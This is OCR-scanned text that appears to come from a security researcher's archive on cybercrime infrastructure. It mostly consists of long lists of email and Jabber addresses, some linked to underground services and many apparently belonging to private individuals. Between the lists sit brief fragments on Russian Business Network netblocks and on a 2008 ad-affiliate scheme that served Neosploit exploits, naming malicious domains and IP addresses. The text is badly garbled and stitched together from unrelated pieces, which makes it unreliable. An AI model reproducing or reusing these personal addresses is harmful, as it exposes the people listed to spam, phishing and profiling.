elitevps@protonmail.com 
elitevps@exploit.im 
elitevps-tech@exploit.im 
d313t3@jabbim.com 
antifr@xmpp.jp 
exchange-24@jabber.ru 
dextroza@sj.ms 
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varius1@exploit.im 
nbgOx1@thesecure. biz 


necromortis@exploit.im 


Mister BertOni@coutersite.org 


xyu.com@mail.ru 
artem2002228228@mail.ru 
putin@putin.kremlin.ru 
sachkat@darkjabber.cc 
admin@exploit.im 
zorron@OnllLne.at 
support@doublevpn.com 
waki@exploit.im 
supp@edu-cash.com 
info@edu-cash.com 
edu-cash@jabber.ru 
affillate@edu-cash.com 
mr _vendor@xmpp.jp 
redraccoon@xmpp.ru 
mkabakovl@gmail.com 
nikitagavrilov81@gmail.com 
blackaples@mail.ru 
tanok@jabber.ru 

mr _coder@exploit.im 
al.mingaleeff@yandex.ru 
help@detalist.info 
kochegar11@mail.ru 
mintosi@exploit.im 
topsec@exploit.im 
proxylist4you.com@sj.ms 
support@advertise.ru 
champ@2zloy.im 
baxterz@exploit.im 
ICQHOOK@jabber.ru 
redkingO13@exploit.im 
andrew54765@jabber.ru 
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raissw@jabbim.com 
elitevps@jab.im 
elitevps@sj.ms 
affillates@essaypro.com 
molemime@exploit.im 
antichat _bar@mail.ru 
bitcoin@intellectx.ru 
understone-9@exploit.im 
tanialad@exploit.im 
support.brazzzers@exploit.im 
admin.brazzzers@exploit.im 
silverking@exploit.im 
bzman@exploit.im 
crabovwik@expoit.im 
seOsmm@jabber.sk 
treko@luckyads.pro 
pavel@luckyads.pro 
mihailportnev@gmail.com 
vilada.botezat.1983@mail.ru 
cryptOwOrld@xmpp.jp 
m578@sj.ms 
support@proxy-gate.com 
alkos@jabb3r.org 

Un O@jabber.ru 

Un _O@jabber.antichat.net 
hOt dO0g@exploit.im 
kaimi@kdetalk.net 
hormold@jabber.antichat.net 
gromaken@xmpp.jp 
hotuinru@xmpp.jp 
djekxa@jabber.ru 
zlom1lgun@gmail.com 
websanta@exploit.im 
romans279@jabber.ru 
sova.ds@mail.ru 
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cristina.rx@jabb3r.org 
ElectrOn@xmpp.jp 
rezetmail@googlemail.com 
reset-mail@exploit.im 
pavillk _fan@mail.ru 
alexandr3@exploit.im 
corp@makag.ru 
makag@jabber.ru 
antibiotic@antichat.net 
z702739@jabber.ru 
smm.smo.ua@gmail.com 
novikov.vavila@gmail.com 
funbizz@exploit.im 
vktech@mail.ru 

feofan _virgiliev@mail.ru 
Fhrustalev@gmail.com 
dirkrause74@gmail.com 
kukrimuksi@xmpp.jp 
mdfswfr@mail.ru 
25dfewretg@inbox.ru 
userl1@mail.ru 
user2@mail.ru 
user3@mail.ru 
ecco@jabbim.pl 
byrger@jabber.ru 
wizztraff@qip.ru 
mozabalint@invitel.hu 
celnil@mail.ru 

elena _avdon@mail.ru 
element-68rus@mail.ru 
egorchenko _79@mail.ru 
cendrineblazy@hotmail.com 
wiktord1985@yandex.ru 
vodila19612009@yandex.ru 


vladiksila@rambler.ru 
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vovan 00000@mail.ru 
arik9999@mail.ru 
dor11@exploit.im 
zdoseg@jabster.pl 
iloafer@xmpp.jp 
dantebailey53@yahoo.com 
dosomething@jabber.ru 
vaar@jabber.ru 
hakjob@exploit.im 
ynada9@jabbim.com 
byded.net@xmpp.jp 
annone@protonmail.com 
anonym.cloud@exploit.im 
yankov.tony@gmail.com 
psihoz26@antichat.net 
support@whoisguard.com 
termexxx@gmail.com 
hard _linux@mail.ru 
vasya@mail.ru 
hormold@inbox.ru 
zonesec@gmail.com 
info@footbolka.ru 
8Ih@inbox.ru 
billygates@microsoft.com 
fepmail@mail.ru 
vin4@inbox.ru 
yursem@gmail.com 
bruhanda@gmail.com 
keysite@mail.ru 
Cuko@neko.im 
dd@exploit.im 
de-sign-ero@yandex.ru 
rebz@gmail.com 
mymail@site.com 
vwpassvw@gmail.com 
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foxeg@qip.ru 
uin8500000@rambler.ru 
Magasss@xmpp.ru 
yonix@yandex.ru 
ruspub@gmail.com 
3p@mail.ru 

3y@mail.ru 

7v@mail.ru 
infotracker.ws@mail.ru 
388366@qip.ru 
S5388366@qip.ru 
fast-hosting@yandex.ru 
admin@svdst.ru 
support@svdst.ru 
acumasilan@hotmail.com 
admin@paksou.com 
aka.oon@gmail.com 
alexepsilon@hotmail.com 
alex-master@hotmail.co.uk 
aaa83@mail.com 
helion-chif@mail.ru 
support@kaspersky.com 
name@domain.com 
hristo.moldovan@gmail.com 
altodar@gmail.com 
f1@mail.ru 

mai@mail.ru 
sitename@site.onion 
amarant@126.com 
bios-kalush@mail.ru 
mirhtmI@narod.ru 
vasserega4@gmail.com 
Ceperaa@Mail.ru 
belovtaras@ukr.net 


work _gooliver@mail.ru 
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ver.dima@gmail.com 
linkobmenl@gmail.com 
proteinchik72@yandex.ru 
qplka@mail.ru 

vano _next@mail.ru 
hpoints@yandex.ru 
78rusdoc.ru@mail.ru 
anlira36@mail.ru 
valent21@i.ua 
eddykugen-2346@bk.ru 
unsubscribe@ucoz.ru 
1@2.com 
password@somehost.com 
pass@evilsite.com 
lop@one.com.pl 
123@qip.ru 
2funny@inbox.ru 
as@iproekt.ru 
smex-x-x@kaddafi.me 
forcebru@brute.tk 
galiaf@exploit.im 
thefilin@qgip.ru 
professor7717help@gmail.com 
voland@xmpp.ru 
vashe@milo.com 
insanity@darkers.com.br 
linc@tormail.net 
avangardfm@mail.ru 
9269964323@mail.ru 
marshal@hotmail.com 
marshal@126.com 
prezident@whitehouse.gov 
gemaglabin@asechka.ru 
ge@ma.ru 

my@mail.ru 
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admin@antichat.ru 
ahmed.obied@gmail.com 
anonymous@boomerang.cvs.sourceforge.net 
wmlight@webmoney.ru 
passport@wmtransfer.com 
support@enum.ru 
prOt3ctlOn@gmail.com 
pechkin@jabber.se 
pe4kin@xmpp.ru 
vzlom.icq@inbox.ru 
agressor@xabber.de 
n@xabber.de 

smt@xabber.de 
agri_man@xabber.de 
online@jabber.no 
infects@ibox.im 
webnewgroup@yandex.ru 
shady123@jabber.ru 
ntt@exploit.im 
art-race74@yandex.ru 
trafikkuplyu@jabber.no 
waldi@debian.org 
mockbuild@builder10.centos.org 
root@testserver.justhost.com 
mockbuild@c1bl.rdu2.centos.org 
mockbuild@build.cloudlinux.com 
mockbuild@kbuilder.bsys.centos.org 
manager@blackservers.org 
blackservers@thesecure. biz 
sliderpost@jabber.ru 
optik@jabber.cz 
optik@exploit.im 
cheffner@tacnetsol.com 
kontrolnaya@mail.ru 


mizantrop@jabbim.com 
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support.ru@icq.com 
administration@corp.mail.ru 
nickname@mail.ru 
opidenum@gmail.com 
amiri@abysssec.com 
rolf@suse.de 

poem|l@suse.de 
FirstX@mail.ru 
webmaster@aquest.antichat.net 
uzlob@mail.ru 
stelmakdv@gmail.com 
mockbuild@builder16.centos.org 
dead-3000@tut.by 
66-66-66@mail.ru 
mpetrovsky@mail.ru 
gekon75@rambler.ru 
jusioner@exploit.im 
avtOrltet@xmpp.jp 
electrOn@jabbim.com 
trOn@xmpp.jp 

ctrOn@xmpp.jp 
missionerskii@jabber.fm 
dkwessler@norwoodlight.com 
electron@jabbim.com 
Emo.irk@oriflame.ru 
wallnutbaby@codingteam.net 
support@traf.tv 
billy@micrsoft.com 
BigBear@antichat.ru 
-Xxx@jabber.ru 
support@icqsell.ru 
frod@xmpp.jp 
frod@exploit.im 
ibmerror@exploit.im 
temchan5@list.ru 
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volnov@prankota.com 
PraymdeD@thesecure. biz 
praym321@jabber.ru 
109.230.199.88@mlg.ru 
epic _world@jabber.cz 
pic@xmpp.jp 
rmxf@jabber.ru 
rbiz@jabber.cz 
gofrein@jabber.ru 
nonbliz@jabber.ru 
nevskiy epic@xmpp.jp 
nevskyi epic@xmpp.jp 
epic world@jabbim.cz 
h4x0r@h4xOr.net 
grey@site.ru 
123@123.ru 
user@site.ru 
me@it.com 
d@yoursystemgotpowned. it 
smomarket15@gmail.com 
mitpirates@sj.ms 
61@list.ru 
aaanet@exploit.im 
exchange 24@jabber.ru 
Support@change-wm.com 
bober1978@crypt.mn 
bober1978@inet.ua 
jagmen@jabber.ru 
467e296a2a8184a@manager.krible.ru 
gsasa5355@gmail.com 
donex@pochta.ru 
x.progon@gmail.com 
admin@ua-hosting.org 
flopik@exploit.im 
dedicatedBrute@exploit.im 
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rostik.braga@mail.ru 
sanchopanso@exploit.im 
gf@finance.magistre.ru 
vladislavaba@xmpp.jp 
support@lastvpn.com 
gebbis@jabber.ru 
sellded@jabber.se 
xxIxxl333@jabb.im 
info-shark@mail.ru 
narull@list.ru 
guru.progon@yandex.ru 
petrova.anl1987@gmail.com 
titova@revenuelab.biz 
shady123@exploit.im 
milguard2014@gmail.com 
1@jabber.24xbtc.com 
videoMMXV@antichat.net 
freesmtp@jabber.ru 
mondlekey@gmail.com 

supp _bot@jabber.cz 
email.txt@email.com 

rural _admin@tubeweb1l.uvm.edu 
root@depts12.u.washington.edu 
driving miyabi@bsd34.qnetau.com 
sequoaya@jabber.ru 
vkid@jabber.ru 
ebubab@ro.ru 
schabanowalexej@yandex.ru 
jannl10@exploit.im 
anwy@exploit.im 
test-player@yandex.ru 
489452@qip.ru 
sdas@mail.ru 

asdas@bk.ru 
ivanovp04ta@mail.ru 
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froggler@jabber.ru 
123@test.com 
me-me@momo.ru 


eml@mail.ru 


idserver_damico@winwebs03.cpt.wa.co.za 


marketing@fcostabrava.com 
rcadia2@rogueriver.dreamhost.com 
vartal990@mail.ua 
vipsmm@yandex.ru 
icq422454641@ya.ru 
nop@exploit.im 
sphinx@xmpp.jp 
kubuntu@exploit.im 
kubuntu@fuckav.ru 
r3darmy@jabber.cz 

t6_ x@hotmail.com 
Linkinsgirl69@yahoo.com 
ishev2007@yandex.ru 


webmaster@cp874990.cpanel.tech-logol.ru 


dezmondtm@jabber.ru 
abrisk@xmpp.jp 
socks@exploit.im 
sre464hfrgt6@4g546ufgfrh5.org 
webmaster@undergroundagents.de 
trew@safe-mail.net 
websanta666@xmpp.jp 
uslugiddos@exploit.im 
obnal-center.us@xmpp.jp 
fxdxzcv@exploit.im 
danator@xmpp.jp 
padalcko@i.ua 
padalcko@vwclub.ua 
dokust12@list.ru 

loads _1@exploit.im 
wind3stroy@xmpp.jp 
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x-ware@exploit.im 
support@proxyx.ru 

socks storm@yahoo.com 
sllrdp@exploit.im 
sllrdpo@xmpp.jp 
mobile2006@xmpp.jp 
dri-m@jabber.no 
shellinfo@exploit.im 
botmaster@bk.ru 
botmaster.ru.support@gmail.com 
botmater@bk.ru 
mail.to.twaego@gmail.com 
zennoboss@ya.ru 
s.support@exploit.im 
nfo@rsup.biz 
vipaff@blackjabber.cc 
vip@vipaff.com 
hola@lospollos.com 
-Lubas0770@gmail.com 
fillplay@bk.ru 

affiliate. napoleoncasino@gmail.com 
Denis—Player21258@ya.ru 
semuel7@jabber.me 
semuel7@ajabber.me 
mangini@xmpp.jp 
benibn77@exploit.im 
benbin77@zloy.im 
ware@exploit.im 
login@email.ru 
vasal234@mail.ru 
proxys@exploit.im 
jabber@safe-inet.com 
support@proxy.insorg.org 
seomarket@protonmail.com 
ily14.1993@gqip.ru 
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pjanoo@list.ru 
sers377@mail.ru 
toni-antoni@yandex.ru 


wodostok666@gmail.com 


web.studio.avram.lincoln@xabber.org 


administrator@antichat.me 
neizvestnost74@xmpp.jp 
info@elitevps.io 
vasileichik@jabber.ru 
sj24man@yandex.ru 
bitcoin@caligula.is 
bitcoin@caligula.pm 
nghpp@yax.im 
guzm4n@exploit.im 
h3rmes@xmpp.jp 
leepdt@exploit.im 
azloj@yax.im 
whitemamba@xabber.org 
orphanedvox@xabber.de 
djekxaa@gmail.com 
kinozala.net@live.ru 
gakrus.perevod@gmail.com 
jack3d@xta.im 
putin.v.v@yandax.ru 
bizbo@protonmail.com 
iTunestop@yandex.ru 
support@partnerlottery.com 
nikolai@partnerlottery.com 
support@lotterypartner.com 
info@nutratechconf.com 
autokrutcom@yandex.ru 
support@apirone.com 
SMMWP@pm.me 
test@62.xxx 


wunschpunsch@xmpp.jp 
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vds dead@xmpp.jp 
montano2288@jabber.ru 
bond333@exploit.im 
fun@exploit.im 
borland3322@sj.ms 
duanejon@exploit.im 
igor.playpay@gmail.com 
ekaterina.playpay@gmail.com 
big.t@thesecure.biz 
grizlii@sj.ms 
grizlii@exploit.im 
dorojka@protonmail.com 
test@gmail.com 
st@gmail.com 

iks. vtop@gmail.com 
softnazaka909@gmail.com 
softnazakaz909@exploit.im 
rgod@autistici.org 
youremail@hotmail.com 
ooohoow@gmail.com 
shpioner@mail.ru 
ked-h@hotmail.com 
amigovpn@exploit.im 
Cleanrdps@exploit.im 
vuke.pro@mail.ru 
interra.incorporate@list.ru 
evowk@thesecure.biz 
evoprol@exploit.im 
BlackTDS@exploit.im 
BlackTDS.com@gmail.com 
BlackTDS@thesecure. biz 
CloudFlare _maill@mail.com 
CloudFlare _mail2@mail.ru 
info@vpsnet. It 
serverhub@jabb.im 
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_ ISP Location 
rei sory 


er 


- Hong Kong Hostfresh 
58.65.232.0 - 58.65.239.255 
Hong Kong Hostfresh 

No. 500, Post Office, 

Tuen Mun, N.T, 

Hong Kong 

phone: +852-35979788 
fax-no: +852-24522539 


These are not just some of the major malware hosting and C &C providers, their infrastructure 
is also appearing on each and every high-profile malware embedded attack assessment that 
| conduct. And since all of these are malicious, the question is which one is the most mali- 
cious one? Let’s say certain netblocks at TurkTelecom are competing with certain netblocks at 
UkrTeleGroup Ltd, however, the emphasis shouldn’t be on the volukme of malicious activities, 
but mostly regarding the ones related to the RBN, and the majority of high-profile malware 
embedded attacks during 2007, and early 2008. 


http: //ddanchev. blogspot .com/2007/10/russian-business-network.htm 
http: //ddanchev.blogspot.com/2007/11/exposing-russian-business-network.htm 


http: //ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.htm 


1. 
2. 
3. 
4 
5. 
6 

7. 


http: //ddanchev. blogspot .com/2007/11/go-to-sleep-go-to-sleep-my-little-rbn.htm 
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JABBER-Professor@thesecure. biz 


seller-rdp-shop@xmpp.jp 
admin-rdp-shop@xmpp.jp 
job-rdp-shop@xmpp.jp 
detroid@safefast.co 
ncuomo@studenti.unina.it 
cristina@onlinerxmasters.com 
penelopacruz@exploit.im 
penelopacruz@sj.ms 
southpaw@thesecure.biz 
info@NAME.net 
stas.sakol@mail.ru 
wolfis@jabbim.ru 
jabuer@jabb.im 
spamertop@jabber.ru 
archerO@exploit.im 
richardhoward@jabbim.cz 
kostyadwert@exploit.im 
darktime@exploit.im 
admin@123.ru 
123@mail.com 
nuce@ask-mail.com 
ggwp@m131.ru 
chris@jalakai.co.uk 
andi@splitbrain.org 
mail@email.ru 
hardytaboo@exploit.im 
support@all-reg.biz 
vashprogonchik@gmail.com 
license@php.net 
helly@php.net 
johannes@php.net 

lisa _backlinks@exploit.im 
wannabuy@chat.wannabuy.biz 


supportru@chat.wannabuy.biz 
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test@yourdomain.com 
support@hq-accounts.ru 
sell shells@jabber.cz 
tramp _66@xmpp.jp 
tramp66@sj.ms 
alltext.com@mail.ru 
-seriousman@jabbim.com 
zorro90s@jabb.im 
soprofit@jabber.ru 
carl@exploit.im 
awert112@exploit.im 
kredo.privat@exploit.im 
minstroelf@jabb.im 
Ika-shop@jabbim.com 
support@vp-next.com 
partners@malokacha.com 
smart-rdp@Jabber.ru 
monicafreya@yandex.com 
supp@money.yandex.ru 
buyingup@jabster.p! 
rizeq@1ljabber.com 
hello@ingramer.com 
whot.isO01@yandex.ru 
gruzovoi@sj.ms 
configshop@jabber.calyxinstitute.org 
slimmyjimmy @jabber.ru 
alinkamolinka@yandex.by 
fesbest@jabb.im 
fellinisi@xmpp.jp 
fellinisi@jabbim.com 
mickola@nat5.academ.org 
suicide@suicidecom.ru 
ApMaregoH@game.arielnet.ru 
_ _ _@186.98.210.213.adsl.tomsknet.ru 


log@rusa02.synserver.de 
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service@cpe-70-116-12-73.austin.res.rr.com 
test5@c-67-189-129-255.hsd1.ny.comcast.net 
List@irc.ventelo.de 
menqu@mail.com 
achurch@achurch.org 
debugger@antichat.in 
izot.adelfinskij@mail.ru 
grfc051@gin.ru 
jasonwu@exploit.im 
alexa _vlad@exploit.im 
svvateam@yahoo.com 
test@test.test 
mymail@myjoomla.com 
123123@213.ru 
michal@cihar.com 
xeka@mail.ru 
petromadsss@gmail.com 
jabber@honese.com 
Xxx@mail.ru 
kacper1964@yahoo.pl 
Dj7xpl@yahoo.com 
video@antichat.net 
_Email@host.com 
suntzu@suntzuuu.com 
a@qwe.ru 

O00@b.org 
f003@bar.org 
fO0@bar.org 
Admin@secuiran.com 
admin@admin.ru 
pattidor@mail.ru 
cemede@ilkposta.com 
Bug@ltSecTeam.com 
Oday@irc.iside.us 
Unit-X@irc.unitx.net 
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login _x@epitech.net 
spoof@live.it 
attack@attack.com 
crazy _kinq@hotmail.co.uk 
mymail@asdasd.ru 
blacksun@xakep.ru 
sOcratex@zonartm.org 
sOcratex@hotmail.com 
test@blah.com 
SomeUser@email.com 
mymail@mail.ru 
webhost1@jabbix.ru 
webhost@jabberim.org 
soll@soll-jabber.net 
support@soll-jabber.net 
sollhost@jabbix.ru 
ked-h@exploit-id.com 
nc.striem@mail.ru 
zarathu@thesarcasm.com 
test@mail.ru 
recip@mail.ru 
myemail@gmail.com 
pypkin@mail.ru 
resyltat@mail.ru 
suuport@mail.ru 
mayor@list.ru 
wstearns@pobox.com 
stixn@mail.ru 
webmaster@site.com 
ide4@rambler.ru 

rax O8@mail.ru 
mail@yandex.ru 
mail@gmail.com 
Miranda@mda-61FDE732.pool.t-online.hu 
test@test.ru 
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u@jabber.se 
mail@mail.com 
wj@wj.com 
skins@invisionboard.com 
skod.uk@gmail.com 
xss@9y.com 
john@autosectools.com 
ducesa@uemail99.com 
e-mail@mail.ru 
you@mail.ru 
my _email@mail.ru 
info@mail.ru 
test@t.com 
a.majd2@yahoo.com 
ge@zjxc.com 
office@joindata.net 
c.szili0O9@hotmail.com 
rezar4424@gmail.com 
sssaeed077@gmail.com 
lagzaei99@gmail.com 
XXXXXX@XXXXX.XXX 
hnise@hi2.in 
takpar4523@gmail.com 
9a7w4@theeasymail.com 
amirgholamyweed@gmail.com 
abolfazich2002@gmail.com 
pomotekanu@tempmailapp.com 
ako.quartz@gmail.com 
lorelai@muuyharold.com 
rezarezail991m@gmail.com 
mohammadreza.zolfagharil@gmail.com 
amirjshams@gmail.com 
erfanbahrie5168@gmail.com 
xevajayake@veanlo.com 
kanil27626@eroyal.net 
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robinsonnathan43@yahoo.com 
soul.steall8@gmail.com 
banksanasia@gmail.com 
verollanil9831983@gmail.com 
patricia _ramiro@hotmail.com 
povedaab@gmail.com 
simonerossa@gmx.de 
sunshinesannel@web.de 
brookeaston@live.com.au 
rocullinan@bigpond.com 

rebe _elizabeth94@hotmail.com 
magnus.eliassonl@gmail.com 
mirisasmay@gmail.com 
nickismithL1@icloud.com 
cnaf692@gmail.com 
hoover03@gmail.com 
mahan.shl02@gmail.com 
d5hd2sfgo@disbox.net 
Waf699@hotmail.com 
gutterjon@hotmail.com 
hubberto@yahoo.co.uk 
qbeqn@hi2.in 
kobraetedal@gmail.com 
okintikil972@gmail.com 
amirmg138181@gmail.com 
danielaligar@gmail.com 
azad.bash73@gmail.com 
soyoreg@fast-coin.com 
valiciu2004@gmail.com 
matin8480@yahoo.com 
e.arkaloon@googlemail.com 
khakyal@yahoo.com 
eilia601103@gmail.com 
arman.behnam@yahoo.com 
vheydari44@yahoo.com 
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ksanaz52@yahoo.com 
k.alizadeh@gml.com 
rezalovestory@yahoo.com 
amirsilent@yahoo.com 
nima.rezaee.nr@gmail.com 
mehdi.mojrian@yahoo.com 
vahid171985@yahoo.com 
mr _baghi59@yahoo.com 
hmorinio@yahoo.com 
baya.sw@gmail.com 

ali_ 9298@yahoo.com 
arast@sapco.com 
mohammadrezagh1974@gmail.com 
k1.vaezi@gmail.com 

saman _2546@yahoo.com 
mhdv12@hotmail.com 
m.r.farhang@gmail.com 
hosein.sedghi@gmail.com 
mohammadalimoghani@yahoo.com 
akbar.pourkashefi@gmail.com 
saedi580@yahoo.com 
ehsan.atar@gmail.com 
saheliha@gmail.com 

ali _metall87@yahoo.com 
ehsan.soft.13@gmail.com 
mamal _a20@yahoo.com 
ghashghayi@gmail.com 

rex _mazi90@Yahoo.com 
qu.marsi@yahoo.com 

navid e _yekta@yahoo.com 
ar.zamini@gmail.com 
aliakbarfarjami@gmail.com 
w7nqk@mail-search.com 
Os46w@247web.net 


vcxzo@appmaillist.com 
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pandaboy626@gmail.com 
Olpto@wémail.com 
Ixuqg@hi2.in 
mojavadebadi@gmail.com 
nelab26906@repshop.net 
hojoy51907@repshop.net 
pisat27071@jmail7.com 
mohammad1374mtk@gmail.com 
rorimum@alltempmail.com 
baki@uber-mail.com 
suxucilube@uemail99.com 
aaaaaaaaa@emailna.co 
jamesforsdyke@hotmail.com 
saeedO0pc@gmail.com 
mmose20@yahoo.com 
salman78s.t@gmail.com 
raghav.srivastava96@gmail.com 
lip.tse.ho@sap.com 
sprocket101@me.com 
xiwwe@bit-degree.com 
d1803509@nwytg.net 
f@acebook.com 

copper top2010@live.com 
rgladspriest@gmail.com 
oliver.wissett@btinternet.com 
vairchris@ymail.com 
tommyvm1997@gmail.com 
tom _howard1@hotmail.com 
jeremy@jeremyprivett.com 
fleck.c@gmail.com 
xro2008@gmail.com 
915083678@qq.com 
osmarverduzco@gmail.com 
leankiid@aol.com 
catam0895@live.com 
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andrew.loy@hotmail.com 
drystenx@gmail.com 
robert.fullaway@yahoo.com 
Codybrown125@yahoo.com 
Eagle11916@q.com 
djtiggerbounce@yahoo.com 
hzqoi@hi2.in 
pogecu@spindl-e.com 
alizorol22@gmail.com 
sajjadmofidil362@yahoo.com 
secret.perusal@gmail.com 
0100mahmoodzadeh@gmail.com 
nathanvincent5@hotmail.com 
misterwillroberts@gmail.com 
srobi0@yahoo.com 
bean6754@gmail.com 
robotskin@hotmail.com 

patty sand010@Qlive.com 
danm74@gmail.com 
lilbryan09@icloud.com 
and.menozzi@gmail.com 
rhyen.martin@gmail.com 
atherine.lattman@ucla.edu 
zach@zapdev.com 
chrisdelucal984@gmail.com 
jonathanwkw@gmail.com 
gamart@gmail.com 
mmateo@gmail.com 
vincent.j.townsend@gmail.com 
tmungioli@gmail.com 
brianbadowski@gmail.com 
kapoleonm@gmail.com 

chuk _nicholas@hotmail.com 
Renfrokhorey@yahoo.com 


hannahproulx12@gmail.com 
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gugatime@gmail.com 
jk.chekpo@yahoo.fr 
jspatru@gmail.com 
jvasquez0206@yahoo.com 
brandonsee3@gmail.com 
michael.okoro23@gmail.com 
chrisvu1998@hotmail.com 
briandyoungberg@gmail.com 
saisovicent@gmail.com 
jonathanharringt6@yahoo.com 
info@eddyvermeer.nl 
albertabramchuk@outlook.com 
theboompipe@gmail.com 
deneire84@gmail.com 
jasondbohermeen@gmail.com 
weil685870@hotmail.com 
ohshawa@gmail.com 
rrazzaq3@gmail.com 
andypayne0O0@gmail.com 
logyn96@gmail.com 
rjyy2281@gmail.com 
2466209867@qq.com 
jrdavidsmeyer@gmail.com 
tayadr32@gmail.com 
johnyoon92@gmail.com 
tylerbullock19@gmail.com 
jerryleung9821@gmail.com 
reporter1996@gmail.com 
raptico@hotmail.com 
red2bates@gmail.com 
jaredattard@gmail.com 
moe74 68@yahoo.com 
cranderson13@aol.com 
jasonrulz25@yahoo.com 


reid.joliat@gmail.com 
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4.2.11 Serving Malware Through Advertising Networks (2008-02-18 17:50) 


PARTMERSIGP PROGRAM FOR WERMASTERS 


Home eicemsy Voginp eR tersiContac 


egis 


News - 06.01.2008 Now we pay you 125 for 10000 unique visitors ! It is the 
Dest offer in all the world ! and We have changed minimum payment to 7S 


Partnership program for you... 


Yeu cmnly peat the sheet one fine banner code on your page(s) and stan to MAKE MONEY, 


74 payout minimum by E-gold os PayPal. 


heater will be deleted without warning 


In need of fresh binaries and malware serving domains? Start feeding your honeyfarm, or 
professional interests by participating in an affiliate network - just like [1]pharmaceutical 
scammers do - that’s literally serving live exploit URLs and dropping malware in real-time. 


Upon registering at xbanners.biz, you’re enticed to IFRAME your web property, and point 
to xtraff.biz/banner.php (67.228.11.176, also responds to interace8.com and cheap-web- 
host.net) and xtraff.biz/ads2.htm currently trying to exploit MDAC ActiveX code execution 
(CVE-2006-0003) through the Neosploit malware kit. Banner.php is for the time being loading 
IFRAMEs to : 


funppc.com/cgi-bin/pl/affiliates/referral.cgi?referral=3098 (63.219.176.194) 
look.fxlayer.net/hop.php (87.98.255.2) 
hartnetwork.org/cgi-bin/in.cgi?p=1018b (216.246.31.236) - Neosploit malware kit 


Moreover, two other IFRAMEs within banner.php attempt to load a multitude of exploit 
serving URLs. xtraff.biz/ads1.htm loads : 


winhex.org/tds/in.cgi?9 (85.255.120.194; the [2]malware embedded attack againt the 
French government'’s Lybia site) 
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joshgreathouse2@msn.com 
courtney15@nycap.rr.com 
landon@landonswan.com 
verbalwr@hotmail.com 
marshallfaircloth@yahoo.com 
donnawitten@hotmail.com 
amwkelley@yahoo.com 
yukorscrazy51@hotmail.com 
rbenjaminblair@gmail.com 
brant.g101@gmail.com 
hughboyd88@gmail.com 
bceebill@bigpond.com 
aaronjbreuer@yahoo.com 
felix.banuchi@gmail.com 
twitterfutch@gmail.com 
wan.raymond@gmail.com 
lukasedut@hotmail.com 
mathieulabrecque91@gmail.com 
narendhran@gmail.com 
globaltrader121@gmail.com 
ssptwdc@yahoo.com 
vinhn@sfu.ca 

klima _brian@yahoo.com 
molodinimariam@gmail.com 
naveen11392@gmail.com 
turrabo@gmx.com 
kiera.henderson@yahoo.com 
Ithomas76@cox.net 
bigfluffygoose@gmail.com 
ihavegoalsinlife2@gmail.com 
havenalignay@hotmail.com 
taylorisomega@gmail.com 
malcorn929@icloud.com 
grein.carsten90@googlemail.com 


zoe.rutledge@gmail.com 
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rodrineves.3@gmail.com 
vaillatjulien@gmail.com 
juliakeith2002@gmail.com 
axelashwin@gmail.com 
goofybond22@gmail.com 
jungdavid0064@gmail.com 
jefferyyang68@gmail.com 
tabmow333@gmail.com 
rinotan@hotmail.com 
Imaguire22@icloud.com 
Timlivingston3092@yahoo.com 
nolanericculp@gmail.com 
hunterstabile@gmail.com 
marcio.rmf@gmail.com 
sophiarossi003@gmail.com 
kaws0O7@msn.com 
zacarnold21@gmail.com 
jakedeloach@hotmail.com 
danielgabancho@gmail.com 
jeremydumalang@gmail.com 
nickyp943@gmail.com 
jasarriera@gmail.com 
james.garmon725@gmail.com 
matos.gusthavo@gmail.com 
thomast2019@isparis.net 
erayxbektas@gmail.com 
98frussell@gmail.com 
awesomedudevikram@gmail.com 
cole.hammond69@yahoo.com 
many1203@gmail.com 
lanl11890@gmail.com 
erick.rivera@gmail.com 
parkermathis@comcast.net 
colliostro@hotmail.com 
pkorsager@gmail.com 
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sabin@teamspooky.com 
sambridges@outlook.com 
j62u6cp4@hotmail.com 
garrettdvs@yahoo.com 
asifob1@gmail.com 
rdavidashley@gmail.com 
albert. vanpham@gmail.com 
mevlutgurkan@yahoo.com 
stuartbarnum@yahoo.com 
cherrygers@yahoo.com 
cribdolly@yahoo.com 

boz youdh@yahoo.com 
tkr500@yahoo.com 
paulanotta@yahoo.com 
Wleinberger@yahoo.com 
manoaks11@yahoo.com 
cydelyn x@yahoo.com 
mim _ozge@yahoo.com 
jap21 2000@yahoo.com 
phrochal7@yahoo.com.br 
ohno21212@gmail.com 
elemerk68@gmail.com 
taijui@gmail.com 
quanlyseo.com@gmail.com 
arnau.naruto@gmail.com 
quintuspower@gmail.com 
maqsood.unique@gmail.com 
alexkaminski555@gmail.com 
itemmido@gmail.com 
masoncadmus@gmail.com 
carumbatm.bull@mail.ru 
kubsjag@wp.pl 

azamat _37846@mail.ru 
lonewolf92999lp@gmail.com 
coolkidchris@ymail.com 
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ilovepensauce@gmail.com 
c1030005317@gmail.com 
shyrik331@yandex.ru 
alistair.lewin@live.fr 
arl5364@gmail.com 
jonas.giezendanner@bluewin.ch 
orcunabanoz@gmail.com 
loser.dominik@gmx.ch 
mihael.sabadija2000@gmail.com 
slava.borovik.2017@mail.ru 
kbobtippetts98@gmail.com 
simon.stolzenberger@web.de 
m.d.martinez99@gmail.com 
diego8b@gmail.com 
rwinston6690@gmail.com 
beaux _15@hotmail.com 
roman _1369@hotmail.com 
andrei.moshkin@mail.ru 
Gunmetal1337@Hotmail.co.uk 
igo237@yandex.ru 
kassimbharwani@gmail.com 
aron.l1@gmx.de 
matiace@interia.pl 
bartvervloet@hotmail.com 
rommel.patrick@yahoo.com 
Viajko56@live.com 
fabiansolo@gmail.com 
paul.digrazia@yahoo.com 
freekkoomen52@gmail.com 
zlbranco@gmail.com 
emailryanarnold@gmail.com 
aggeloskaraki@gmail.com 
p@n.com 

vp@n.com 
kingofnoop@yahoo.com 
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mohammadreza2045@yahoo.com 
ssl@jo-mail.com 
sajaddehghani96@gmail.com 
mehrdadamani0922@gmail.com 
6riyn6j@repshop.net 
6zpq5@skymailapp.com 
mohammadreza2616@gmail.com 
marco.molino1964@gmail.com 
21bc9ab7e6@mailox. biz 
28365b88cd@mailox. biz 
2hjwj@5sun.net 
g3304971@nwytg.com 
sansiz20@gmail.com 
hosseinsalabati@gmail.com 
Slvi3@mailfile.net 
tprivateloader@hotmail.com 
zesotidu@hotmailpro.info 
mrshelbyO20@gmail.com 
scorpion619s619s@gmail.com 
silasayiv@loketa.com 
sezixeja@email-server.info 
dr.good830@gmail.com 
Ilvir.software@gmail.com 
kaleceh@dr-mail.net 
cbodska@hi2.in 
ba5dbc2389@mailox. biz 
ruleb@veanlo.com 
ermianoruzi@gmail.com 
We213e@gmail.com 
malakouti@ymail.com 
sina7596@jo-mail.com 
